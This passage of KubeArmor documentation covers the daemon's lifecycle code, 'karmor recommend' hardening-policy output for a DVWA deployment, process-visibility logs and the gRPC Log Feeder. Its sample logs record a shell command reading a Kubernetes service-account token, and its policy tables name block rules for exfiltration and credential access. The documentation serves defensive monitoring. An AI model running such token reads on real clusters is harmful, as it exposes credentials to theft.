// InitRuntimeEnforcer Function (Called by Daemon)
func (dm *KubeArmorDaemon) InitRuntimeEnforcer(pinpath string) bool {
    // Create a new RuntimeEnforcer instance, passing it data/references
	dm.RuntimeEnforcer = efc.NewRuntimeEnforcer(
        dm.Node, // Node info
        pinpath, // BPF pin path from the monitor
        dm.Logger, // Reference to the logger
        dm.SystemMonitor, // Reference to the monitor (for BPF integration needs)
    )
	return dm.RuntimeEnforcer != nil
}

Explanation:

  • NewKubeArmorDaemon is like the constructor; it creates the Daemon object and initializes its basic fields and locks. Pointers to components like Logger, SystemMonitor, RuntimeEnforcer are initially zeroed.

  • The main KubeArmor() function then calls dedicated Init... methods on the dm object (like dm.InitLogger(), dm.InitSystemMonitor(), dm.InitRuntimeEnforcer()).

  • These Init... methods are responsible for creating the actual instances of the other components using their respective New... functions (e.g., mon.NewSystemMonitor()) and assigning the returned object to the Daemon's pointer field (dm.SystemMonitor = ...). They pass necessary configuration and references (like the Logger) to the components they initialize.

  • After initializing components, the Daemon starts goroutines (using go dm.SomeFunction()) for tasks that need to run continuously in the background, like serving logs, monitoring system events, or watching external APIs.

  • The main flow then typically waits for a shutdown signal (<-sigChan).

  • When a signal is received, dm.DestroyKubeArmorDaemon() is called, which in turn calls Close... methods on the components to shut them down gracefully.

This demonstrates the Daemon's role in the lifecycle: it's the entity that brings the other parts to life, wires them together by passing references, starts their operations, and orchestrates their shutdown.
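
The wait-for-signal pattern at the end of KubeArmor() is standard Go. Here's a minimal standalone sketch of it, assuming GetOSSigChannel wraps roughly this logic (the final print stands in for DestroyKubeArmorDaemon):

package main

import (
	"fmt"
	"os"
	"os/signal"
	"syscall"
)

func main() {
	// Roughly what GetOSSigChannel sets up (simplified sketch).
	sigChan := make(chan os.Signal, 1)
	signal.Notify(sigChan, syscall.SIGINT, syscall.SIGTERM)

	fmt.Println("running; send SIGINT or SIGTERM to stop")
	<-sigChan // block until a shutdown signal arrives

	// Here the real daemon calls DestroyKubeArmorDaemon(), which in
	// turn closes the enforcer, monitor, and logger gracefully.
	fmt.Println("shutting down cleanly")
}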

Daemon as the Information Hub

The Daemon isn't just starting components; it's managing the flow of information:

  1. Policies In: The Daemon actively watches the Kubernetes API (or receives updates in non-K8s mode) for changes to KubeArmor policies. When it gets a policy, it stores it in its SecurityPolicies or HostSecurityPolicies lists and notifies the Runtime Enforcer to update the kernel rules for affected workloads.

  2. Identity Management: The Daemon watches Pod/Container/Node events from Kubernetes and the container runtime. It populates internal structures (like the Containers map) which are then used by the System Monitor to correlate raw kernel events with workload identity (Container/Node Identity). While the NsMap itself might live in the Monitor (as seen in Chapter 4 context), the Daemon is responsible for gathering the initial K8s/CRI data needed to populate that map.

  3. Events Up: The System Monitor constantly reads raw event data from the kernel (via BPF ring buffer). It performs the initial lookup using the Namespace IDs and passes the enriched events (likely via Go channels, as hinted in Chapter 4 code) back to the Daemon or a component managed by the Daemon (like the logging pipeline within the Feeder).

  4. Logs Out: The Daemon (or its logging pipeline) takes these enriched events and passes them to the Log Feeder component. The Log Feeder is then responsible for sending these logs/alerts to the configured output destinations.

The Daemon acts as the central switchboard, ensuring that policies are delivered to the enforcement layer, that kernel events are enriched with workload context, and that meaningful security logs and alerts are generated and sent out.
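
As a rough sketch of this switchboard role, the following self-contained example models the event path with plain Go channels: Monitor in, Daemon in the middle, Feeder out. The types are hypothetical; the real components are wired with more structure:

package main

import "fmt"

// enrichedEvent is a stand-in for the context-enriched events that
// flow from the Monitor through the Daemon to the Feeder.
type enrichedEvent struct {
	ContainerID string
	Operation   string
	Result      string
}

func main() {
	fromMonitor := make(chan enrichedEvent) // System Monitor -> Daemon
	toFeeder := make(chan enrichedEvent)    // Daemon -> Log Feeder

	// Daemon: receive events and pass them on to the feeder.
	go func() {
		for ev := range fromMonitor {
			toFeeder <- ev
		}
		close(toFeeder)
	}()

	// Monitor side: emit one enriched event, then stop.
	go func() {
		fromMonitor <- enrichedEvent{"db-container-1234", "exec /bin/bash", "Blocked"}
		close(fromMonitor)
	}()

	// Feeder side: print whatever arrives.
	for ev := range toFeeder {
		fmt.Printf("%s: %s (%s)\n", ev.ContainerID, ev.Operation, ev.Result)
	}
}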

Daemon Responsibilities Summary

  • Component Management: starts, stops, and manages the lifecycle of the Monitor, Enforcer, and Logger. Interacts with: System Monitor, Runtime Enforcer, Log Feeder.

  • External Communication: watches the K8s API for policies and workload info; interacts with the CRI. Interacts with: Kubernetes API server; container runtimes (Docker, containerd, CRI-O).

  • Identity Building: gathers data (labels, namespaces, container IDs, PIDs, namespace IDs) to map low-level events to workloads. Interacts with: Kubernetes API server, container runtimes, OS kernel (/proc).

  • Policy Processing: fetches policies and identifies the targeted workloads on its node. Interacts with: Kubernetes API server; internal state (identity).

  • Enforcement Orchestration: tells the Runtime Enforcer which policies to load for which workload. Interacts with: Runtime Enforcer; internal state (identity, policies).

  • Event Reception: receives raw or partially processed events from the Monitor. Interacts with: System Monitor (via channels/buffers).

  • Event Enrichment: adds full workload identity and policy context to incoming events. Interacts with: System Monitor; internal state (identity, policies).

  • Logging/Alerting: formats events into structured logs/alerts and passes them to the Log Feeder. Interacts with: Log Feeder; internal state (enriched events).

  • Configuration/Signals: reads configuration and handles graceful shutdown requests. Interacts with: configuration files/API, OS signals.

This summary reinforces that the Daemon is the crucial integration layer on each node.

Conclusion

In this chapter, you learned that the KubeArmor Daemon is the core process running on each node, serving as the central orchestrator for all other KubeArmor components. It's responsible for initializing, managing, and coordinating the System Monitor (eyes/ears), Runtime Enforcer (security guard), and Log Feeder (reporter). You saw how it interacts with Kubernetes and container runtimes to understand Container/Node Identity and fetch Security Policies, bringing all the pieces together to enforce your security posture and report violations.

Understanding the Daemon's central role is key to seeing how KubeArmor operates as a cohesive system on each node. In the final chapter, we'll focus on where all the security events observed by the Daemon and its components end up: the Log Feeder.

Harden Infrastructure

KubeArmor is a security solution for Kubernetes and cloud-native platforms that helps protect your workloads from attacks and threats. It does this by providing a set of hardening policies based on industry-leading compliance and attack frameworks such as CIS, MITRE, NIST-800-53, and STIGs. These policies are designed to help you secure your workloads in a way that is compliant with these frameworks and recommended best practices.

One of the key features of KubeArmor is that it provides these hardening policies out-of-the-box, meaning that you don't have to spend time researching and configuring them yourself. Instead, you can simply apply the policies to your workloads and immediately start benefiting from the added security that they provide.

Additionally, KubeArmor presents these hardening policies in the context of your workload, so you can see how they will be applied and what impact they will have on your system. This allows you to make informed decisions about which policies to apply, and helps you understand the trade-offs between security and functionality.

Overall, KubeArmor is a powerful tool for securing your Kubernetes workloads, and its out-of-the-box hardening policies based on industry-leading compliance and attack frameworks make it easy to get started and ensure that your system is as secure as possible.

What is the source of these hardening policies?

The rules in hardening policies are based on inputs from:

  1. MITRE TTPs

  2. Security Technical Implementation Guides (STIGs)

  3. NIST SP 800-53A

  4. Center for Internet Security (CIS)

  5. Several others...

Hardening policies are derived from these industry-leading compliance standards and attack frameworks. The KubeArmor Policy Templates repository contains the latest hardening policies. The KubeArmor client tool (karmor) provides a way (karmor recommend) to fetch the policies in the context of Kubernetes workloads or a specific container from the command line. The output is a set of KubeArmorPolicy or KubeArmorHostPolicy objects that can be applied using k8s-native tools (such as kubectl apply).

How to fetch hardening policies?

Pre-requisites:

  1. Install KubeArmor

    • curl -sfL http://get.kubearmor.io/ | sudo sh -s -- -b /usr/local/bin && karmor install

  2. Get the hardening policies in the context of all the deployments in namespace NAMESPACE:

    • karmor recommend -n NAMESPACE

    • The recommended policies would be available in the out folder.

Sample recommended hardening policies

❯ karmor recommend -n dvwa
INFO[0000] pulling image                                 image="cytopia/dvwa:php-8.1"
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-maintenance-tool-access.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-cert-access.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-owner-discovery.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-deny-write-under-bin-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-write-under-dev-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-system-monitoring-detect-access-to-cronjob-files.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-least-functionality-execute-package-management-process-in-container.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-remote-file-copy.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-in-shm-folder.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-under-etc-directory.yaml ...
created policy out/dvwa-dvwa-web/cytopia-dvwa-php-8-1-deny-write-under-etc-directory.yaml ...
INFO[0000] pulling image                                 image="mariadb:10.1"
created policy out/dvwa-dvwa-mysql/mariadb-10-1-maintenance-tool-access.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-cert-access.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-owner-discovery.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-deny-write-under-bin-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-write-under-dev-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-system-monitoring-detect-access-to-cronjob-files.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-least-functionality-execute-package-management-process-in-container.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-remote-file-copy.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-in-shm-folder.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-under-etc-directory.yaml ...
created policy out/dvwa-dvwa-mysql/mariadb-10-1-deny-write-under-etc-directory.yaml ...
output report in out/report.txt ...
  Deployment              | dvwa/dvwa-web
  Container               | cytopia/dvwa:php-8.1
  OS                      | linux
  Arch                    |
  Distro                  |
  Output Directory        | out/dvwa-dvwa-web
  policy-template version | v0.1.6
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
|               POLICY                |           SHORT DESC           | SEVERITY | ACTION |                       TAGS                        |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-maintenance-   | Restrict access to maintenance | 1        | Block  | PCI_DSS                                           |
| tool-access.yaml                    | tools (apk, mii-tool, ...)     |          |        | MITRE                                             |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-cert-          | Restrict access to trusted     | 1        | Block  | MITRE                                             |
| access.yaml                         | certificated bundles in the OS |          |        | MITRE_T1552_unsecured_credentials                 |
|                                     | image                          |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-owner-  | System Information Discovery   | 3        | Block  | MITRE                                             |
| discovery.yaml                      | - block system owner discovery |          |        | MITRE_T1082_system_information_discovery          |
|                                     | commands                       |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-        | System and Information         | 5        | Block  | NIST NIST_800-53_AU-2                             |
| monitoring-deny-write-under-bin-    | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4 MITRE                            |
| directory.yaml                      | make directory under /bin/     |          |        | MITRE_T1036_masquerading                          |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-        | System and Information         | 5        | Audit  | NIST NIST_800-53_AU-2                             |
| monitoring-write-under-dev-         | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4 MITRE                            |
| directory.yaml                      | make files under /dev/         |          |        | MITRE_T1036_masquerading                          |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-system-        | System and Information         | 5        | Audit  | NIST SI-4                                         |
| monitoring-detect-access-to-        | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4                                  |
| cronjob-files.yaml                  | Detect access to cronjob files |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-least-         | System and Information         | 5        | Block  | NIST                                              |
| functionality-execute-package-      | Integrity - Least              |          |        | NIST_800-53_CM-7(4)                               |
| management-process-in-              | Functionality deny execution   |          |        | SI-4 process                                      |
| container.yaml                      | of package manager process in  |          |        | NIST_800-53_SI-4                                  |
|                                     | container                      |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-remote-   | The adversary is trying to     | 5        | Block  | MITRE                                             |
| file-copy.yaml                      | steal data.                    |          |        | MITRE_TA0008_lateral_movement                     |
|                                     |                                |          |        | MITRE_TA0010_exfiltration                         |
|                                     |                                |          |        | MITRE_TA0006_credential_access                    |
|                                     |                                |          |        | MITRE_T1552_unsecured_credentials                 |
|                                     |                                |          |        | NIST_800-53_SI-4(18) NIST                         |
|                                     |                                |          |        | NIST_800-53 NIST_800-53_SC-4                      |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write-in- | The adversary is trying to     | 5        | Block  | MITRE_execution                                   |
| shm-folder.yaml                     | write under shm folder         |          |        | MITRE                                             |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write-    | The adversary is trying to     | 5        | Block  | NIST_800-53_SI-7 NIST                             |
| under-etc-directory.yaml            | avoid being detected.          |          |        | NIST_800-53_SI-4 NIST_800-53                      |
|                                     |                                |          |        | MITRE_T1562.001_disable_or_modify_tools           |
|                                     |                                |          |        | MITRE_T1036.005_match_legitimate_name_or_location |
|                                     |                                |          |        | MITRE_TA0003_persistence                          |
|                                     |                                |          |        | MITRE MITRE_T1036_masquerading                    |
|                                     |                                |          |        | MITRE_TA0005_defense_evasion                      |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| cytopia-dvwa-php-8-1-deny-write-    | Adversaries may delete or      | 5        | Block  | NIST NIST_800-53 NIST_800-53_CM-5                 |
| under-etc-directory.yaml            | modify artifacts generated     |          |        | NIST_800-53_AU-6(8)                               |
|                                     | within systems to remove       |          |        | MITRE_T1070_indicator_removal_on_host             |
|                                     | evidence.                      |          |        | MITRE MITRE_T1036_masquerading                    |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+

  Deployment              | dvwa/dvwa-mysql
  Container               | mariadb:10.1
  OS                      | linux
  Arch                    |
  Distro                  |
  Output Directory        | out/dvwa-dvwa-mysql
  policy-template version | v0.1.6
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
|               POLICY                |           SHORT DESC           | SEVERITY | ACTION |                       TAGS                        |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-maintenance-tool-      | Restrict access to maintenance | 1        | Block  | PCI_DSS                                           |
| access.yaml                         | tools (apk, mii-tool, ...)     |          |        | MITRE                                             |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-cert-access.yaml       | Restrict access to trusted     | 1        | Block  | MITRE                                             |
|                                     | certificated bundles in the OS |          |        | MITRE_T1552_unsecured_credentials                 |
|                                     | image                          |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-owner-          | System Information Discovery   | 3        | Block  | MITRE                                             |
| discovery.yaml                      | - block system owner discovery |          |        | MITRE_T1082_system_information_discovery          |
|                                     | commands                       |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring-     | System and Information         | 5        | Block  | NIST NIST_800-53_AU-2                             |
| deny-write-under-bin-directory.yaml | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4 MITRE                            |
|                                     | make directory under /bin/     |          |        | MITRE_T1036_masquerading                          |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring-     | System and Information         | 5        | Audit  | NIST NIST_800-53_AU-2                             |
| write-under-dev-directory.yaml      | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4 MITRE                            |
|                                     | make files under /dev/         |          |        | MITRE_T1036_masquerading                          |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-system-monitoring-     | System and Information         | 5        | Audit  | NIST SI-4                                         |
| detect-access-to-cronjob-files.yaml | Integrity - System Monitoring  |          |        | NIST_800-53_SI-4                                  |
|                                     | Detect access to cronjob files |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-least-functionality-   | System and Information         | 5        | Block  | NIST                                              |
| execute-package-management-process- | Integrity - Least              |          |        | NIST_800-53_CM-7(4)                               |
| in-container.yaml                   | Functionality deny execution   |          |        | SI-4 process                                      |
|                                     | of package manager process in  |          |        | NIST_800-53_SI-4                                  |
|                                     | container                      |          |        |                                                   |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-remote-file-      | The adversary is trying to     | 5        | Block  | MITRE                                             |
| copy.yaml                           | steal data.                    |          |        | MITRE_TA0008_lateral_movement                     |
|                                     |                                |          |        | MITRE_TA0010_exfiltration                         |
|                                     |                                |          |        | MITRE_TA0006_credential_access                    |
|                                     |                                |          |        | MITRE_T1552_unsecured_credentials                 |
|                                     |                                |          |        | NIST_800-53_SI-4(18) NIST                         |
|                                     |                                |          |        | NIST_800-53 NIST_800-53_SC-4                      |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-in-shm-     | The adversary is trying to     | 5        | Block  | MITRE_execution                                   |
| folder.yaml                         | write under shm folder         |          |        | MITRE                                             |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-under-etc-  | The adversary is trying to     | 5        | Block  | NIST_800-53_SI-7 NIST                             |
| directory.yaml                      | avoid being detected.          |          |        | NIST_800-53_SI-4 NIST_800-53                      |
|                                     |                                |          |        | MITRE_T1562.001_disable_or_modify_tools           |
|                                     |                                |          |        | MITRE_T1036.005_match_legitimate_name_or_location |
|                                     |                                |          |        | MITRE_TA0003_persistence                          |
|                                     |                                |          |        | MITRE MITRE_T1036_masquerading                    |
|                                     |                                |          |        | MITRE_TA0005_defense_evasion                      |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+
| mariadb-10-1-deny-write-under-etc-  | Adversaries may delete or      | 5        | Block  | NIST NIST_800-53 NIST_800-53_CM-5                 |
| directory.yaml                      | modify artifacts generated     |          |        | NIST_800-53_AU-6(8)                               |
|                                     | within systems to remove       |          |        | MITRE_T1070_indicator_removal_on_host             |
|                                     | evidence.                      |          |        | MITRE MITRE_T1036_masquerading                    |
+-------------------------------------+--------------------------------+----------+--------+---------------------------------------------------+

Key highlights:

  1. The hardening policies are available by default in the out folder separated out in directories based on deployment names.

  2. Get an HTML report by using the option --report report.html with karmor recommend.

  3. Get hardening policies in the context of a specific compliance framework by specifying the --tag <CIS/MITRE/...> option, as in the combined example below.
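
For example (a sketch; the namespace and resulting output directory are illustrative), the options can be combined and the generated policies applied directly:

karmor recommend -n wordpress-mysql --tag MITRE --report report.html
kubectl apply -f out/wordpress-mysql-wordpress/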

Application Behavior

KubeArmor has visibility into system and application behavior. It summarizes/aggregates this information and provides a user-friendly view for understanding application behavior.

What application behavior is shown?

  • Process data:

    • What are the processes executing in the pods?

    • What processes are executing through which parent processes?

  • File data:

    • What are the file system accesses made by different processes?

  • Network Accesses:

    • What are the Ingress/Egress connections from the pod?

    • Which server binds (listening ports) are opened in the pod?

How to get the application behavior?

Get visibility into process executions in the default namespace:

karmor logs -n default --json --logFilter all --operation process
{
  "Timestamp": 1686491023,
  "UpdatedTime": "2023-06-11T13:43:43.289380Z",
  "ClusterName": "default",
  "HostName": "ip-172-31-24-142",
  "NamespaceName": "default",
  "PodName": "nginx-8f458dc5b-fl42t",
  "Labels": "app=nginx",
  "ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
  "ContainerName": "nginx",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
  "ParentProcessName": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/runc",
  "ProcessName": "/bin/sh",
  "HostPPID": 3488352,
  "HostPID": 3488357,
  "PPID": 3488352,
  "PID": 832,
  "Type": "ContainerLog",
  "Source": "/x86_64-bottlerocket-linux-gnu/sys-root/usr/bin/runc",
  "Operation": "Process",
  "Resource": "/bin/sh -c cat /run/secrets/kubernetes.io/serviceaccount/token",
  "Data": "syscall=SYS_EXECVE",
  "Result": "Passed"
}
{
  "Timestamp": 1686491023,
  "UpdatedTime": "2023-06-11T13:43:43.291471Z",
  "ClusterName": "default",
  "HostName": "ip-172-31-24-142",
  "NamespaceName": "default",
  "PodName": "nginx-8f458dc5b-fl42t",
  "Labels": "app=nginx",
  "ContainerID": "8762eafc25a35ab90089f79703b86659989e8e547c2c029fb60f55d884355000",
  "ContainerName": "nginx",
  "ContainerImage": "docker.io/library/nginx:latest@sha256:af296b188c7b7df99ba960ca614439c99cb7cf252ed7bbc23e90cfda59092305",
  "ParentProcessName": "/bin/dash",
  "ProcessName": "/bin/cat",
  "HostPPID": 3488357,
  "HostPID": 3488363,
  "PPID": 832,
  "PID": 838,
  "Type": "ContainerLog",
  "Source": "/bin/dash",
  "Operation": "Process",
  "Resource": "/bin/cat /run/secrets/kubernetes.io/serviceaccount/token",
  "Data": "syscall=SYS_EXECVE",
  "Result": "Passed"
}

Log Feeder

Welcome back to the KubeArmor tutorial! In the previous chapters, we've learned how KubeArmor defines security rules using Security Policies, identifies workloads using Container/Node Identity, enforces policies with the Runtime Enforcer, and observes system activity with the System Monitor, all powered by the underlying BPF (eBPF) technology and orchestrated by the KubeArmor Daemon on each node.

We've discussed how KubeArmor can audit or block actions based on policies. But where do you actually see the results of this monitoring and enforcement? How do you know when a policy was violated or when suspicious activity was detected?

This is where the Log Feeder comes in.

What is the Log Feeder?

Think of the Log Feeder as KubeArmor's reporting and alerting system. Its primary job is to collect all the security-relevant events and telemetry that KubeArmor detects and make them available to you and other systems.

It receives structured information, including:

  • Security Alerts: Notifications about actions that were audited or blocked because they violated a Security Policy.

  • System Logs: Telemetry about system activities that KubeArmor is monitoring, even if no specific policy applies (e.g., process executions, file accesses, network connections, depending on visibility settings).

  • KubeArmor Messages: Internal messages from the KubeArmor Daemon itself (useful for debugging and monitoring KubeArmor's status).

The Log Feeder formats this information into standardized messages (using Protobuf, a language-neutral, platform-neutral, extensible mechanism for serializing structured data) and sends it out over a gRPC interface. gRPC is a high-performance framework for inter-process communication.

This gRPC interface allows various clients to connect to the KubeArmor Daemon on each node and subscribe to streams of these security events in real-time. Tools like karmor log (part of the KubeArmor client tools) connect to this feeder to display events. External systems like Security Information and Event Management (SIEM) platforms can also integrate by writing clients that understand the KubeArmor gRPC format.

Why is Log Feeding Important? Your Window into Security

You've deployed KubeArmor and applied policies. Now you need to answer questions like:

  • Was that attempt to read /etc/passwd from the web server container actually blocked?

  • Is any process on my host nodes trying to access sensitive files like /root/.ssh?

  • Are my applications spawning unexpected shell processes, even if they aren't explicitly blocked by policy?

  • Did KubeArmor successfully apply the policies I created?

The Log Feeder provides the answers by giving you a stream of events directly from KubeArmor:

  • It reports when an action was Blocked by a specific policy, providing details about the workload and the attempted action.

  • It reports when an action was Audited, showing you potentially suspicious behavior even if it wasn't severe enough to block.

  • It reports general System Events (logs), giving you visibility into the normal or unusual behavior of processes, file accesses, and network connections on your nodes and within containers.

Without the Log Feeder, KubeArmor would be enforcing policies blindly from a monitoring perspective: you wouldn't have the visibility needed to understand your security posture, detect attacks (even failed ones), or troubleshoot policy issues.

Use Case Example: You want to see every time someone tries to execute a shell (/bin/sh, /bin/bash) inside any of your containers. You might create an Audit Policy for this. The Log Feeder is how you'll receive the notifications for these audited events.
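
A minimal sketch of such an audit policy (illustrative; adjust the selector labels and namespace to your workload):

apiVersion: security.kubearmor.com/v1
kind: KubeArmorPolicy
metadata:
  name: audit-shell-exec
  namespace: default
spec:
  severity: 3
  selector:
    matchLabels:
      app: nginx
  process:
    matchPaths:
    - path: /bin/sh
    - path: /bin/bash
  action: Audit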

How the Log Feeder Works (High-Level)

  1. Event Source: The System Monitor observes kernel events (process execution, file access, etc.). It enriches these events with Container/Node Identity and sends them to the KubeArmor Daemon. The Runtime Enforcer also contributes by confirming if an event was blocked or audited by policy.

  2. Reception by Daemon: The KubeArmor Daemon receives these enriched events.

  3. Formatting (by Feeder): The Daemon passes the event data to the Log Feeder component. The Feeder takes the structured event data and converts it into the predefined Protobuf message format (e.g., Alert or Log message types defined in protobuf/kubearmor.proto).

  4. Queueing: The Feeder manages internal queues or channels for different types of messages (Alerts, Logs, general KubeArmor Messages). It puts the newly formatted Protobuf message onto the appropriate queue/channel.

  5. gRPC Server: The Feeder runs a gRPC server on a specific port (default 32767).

  6. Client Subscription: External clients connect to this gRPC port and call specific gRPC methods (like WatchAlerts or WatchLogs) to subscribe to event streams.

  7. Event Streaming: When a client subscribes, the Feeder gets a handle to the client's connection. It then continuously reads messages from its internal queues/channels and streams them over the gRPC connection to the connected client.
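
To poke at the gRPC interface described in steps 5-7 interactively, one option is grpcurl (a sketch, assuming grpcurl is installed and the feeder's gRPC reflection is enabled):

grpcurl -plaintext localhost:32767 list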

In short, events flow from the kernel, up through the System Monitor and Daemon, are formatted by the Log Feeder, and are then streamed out to any connected clients.

Looking at the Code (Simplified)

The Log Feeder is implemented primarily in KubeArmor/feeder/feeder.go and KubeArmor/feeder/logServer.go, using definitions from protobuf/kubearmor.proto and the generated protobuf/kubearmor_grpc.pb.go.

First, let's look at the Protobuf message structures. These define the schema for the data that gets sent out.

Referencing protobuf/kubearmor.proto:

// Simplified Protobuf definition for an Alert message
message Alert {
  int64 Timestamp = 1;
  string UpdatedTime = 2;
  string ClusterName = 3;
  string HostName = 4;
  string NamespaceName = 5;
  Podowner Owner = 31; // Link to PodOwner struct
  string PodName = 6;
  string Labels = 29;

  string ContainerID = 7;
  string ContainerName = 8;
  string ContainerImage = 24;

  // Process details (host/container PIDs, names, UID)
  int32 HostPPID = 27;
  int32 HostPID = 9;
  int32 PPID = 10;
  int32 PID = 11;
  int32 UID = 12;
  string ParentProcessName = 25;
  string ProcessName = 26;

  // Policy/Enforcement details
  string PolicyName = 13;
  string Severity = 14;
  string Tags = 15; // Comma separated tags from policy
  repeated string ATags = 30; // Tags as a list

  string Message = 16; // High-level description
  string Type = 17; // e.g., MatchedPolicy, MatchedHostPolicy, SystemEvent
  string Source = 18; // e.g., /bin/bash
  string Operation = 19; // e.g., Process, File, Network
  string Resource = 20; // e.g., /etc/passwd, tcp://1.2.3.4:80
  string Data = 21; // Additional data if any
  string Enforcer = 28; // e.g., BPFLSM, AppArmor, eBPF Monitor
  string Action = 22; // e.g., Allow, Audit, Block
  string Result = 23; // e.g., Failed, Passed, Error

  // Context details
  string Cwd = 32; // Current working directory
  string TTY = 33; // TTY information

  // Throttling info (for alerts)
  int32 MaxAlertsPerSec = 34;
  int32 DroppingAlertsInterval = 35;

  ExecEvent ExecEvent = 36; // Link to ExecEvent struct

  // ... other fields
}

// Simplified Protobuf definition for a Log message (similar but fewer policy fields)
message Log {
  int64 Timestamp = 1;
  string UpdatedTime = 2;
  // ... similar identity/process fields as Alert ...
  string Type = 13; // e.g., ContainerLog, HostLog
  string Source = 14;
  string Operation = 15;
  string Resource = 16;
  string Data = 17;
  string Result = 18; // e.g., Success, Failed

  string Cwd = 25;
  string TTY = 26;

  ExecEvent ExecEvent = 27;
}

// Simplified definitions for nested structs
message Podowner {
  string Ref = 1;
  string Name = 2;
  string Namespace = 3;
}

message ExecEvent {
  string ExecID = 1;
  string ExecutableName = 2;
}

These Protobuf definitions specify the exact structure and data types for the messages KubeArmor will send, ensuring that clients know exactly what data to expect. The .pb.go and _grpc.pb.go files are automatically generated from this .proto file and provide the Go code for serializing/deserializing these messages and implementing the gRPC service.

Now, let's look at the Log Feeder implementation in Go.

Referencing KubeArmor/feeder/feeder.go:

// NewFeeder Function (Simplified)
func NewFeeder(node *tp.Node, nodeLock **sync.RWMutex) *Feeder {
	fd := &Feeder{}

	// Initialize data structures to hold connection channels
	fd.EventStructs = &EventStructs{
		MsgStructs: make(map[string]EventStruct[pb.Message]),
		MsgLock:    sync.RWMutex{},
		AlertStructs: make(map[string]EventStruct[pb.Alert]),
		AlertLock:  sync.RWMutex{},
		LogStructs: make(map[string]EventStruct[pb.Log]),
		LogLock:    sync.RWMutex{},
	}

	// Configure and start the gRPC server
	fd.Port = fmt.Sprintf(":%s", cfg.GlobalCfg.GRPC) // Get port from config
	listener, err := net.Listen("tcp", fd.Port)
	if err != nil {
		kg.Errf("Failed to listen a port (%s, %s)", fd.Port, err.Error())
		return nil // Handle error
	}
	fd.Listener = listener

	// Create the gRPC server instance
	logService := &LogService{
		QueueSize:    1000, // Define queue size for client channels
		Running:      &fd.Running,
		EventStructs: fd.EventStructs, // Pass the connection store
	}
	fd.LogServer = grpc.NewServer(/* ... gRPC server options ... */)

	// Register the LogService implementation with the gRPC server
	pb.RegisterLogServiceServer(fd.LogServer, logService)

	// ... other initialization ...

	return fd
}

// ServeLogFeeds Function (Called by the Daemon)
func (fd *BaseFeeder) ServeLogFeeds() {
	fd.WgServer.Add(1)
	defer fd.WgServer.Done()

	// This line blocks forever, serving gRPC requests until Listener.Close() is called
	if err := fd.LogServer.Serve(fd.Listener); err != nil {
		kg.Print("Terminated the gRPC service")
